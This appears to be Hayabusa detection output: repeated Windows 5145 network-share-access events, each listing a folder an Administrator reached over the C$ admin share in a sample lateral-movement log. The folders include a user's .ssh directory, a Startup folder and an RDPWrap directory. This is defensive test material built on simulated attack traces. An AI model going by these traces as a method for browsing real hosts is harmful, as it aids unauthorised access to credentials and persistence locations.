+2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\.ssh  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\AppData  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\AppData\Roaming  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\AppData\Roaming\Microsoft  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\New folder  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\plugins  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\RDPWrap-v1.6.2  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\translations  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x32  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x32\db  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x32\garbage  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x32\memdumps  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x32\platforms  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x32\plugins  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x64  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
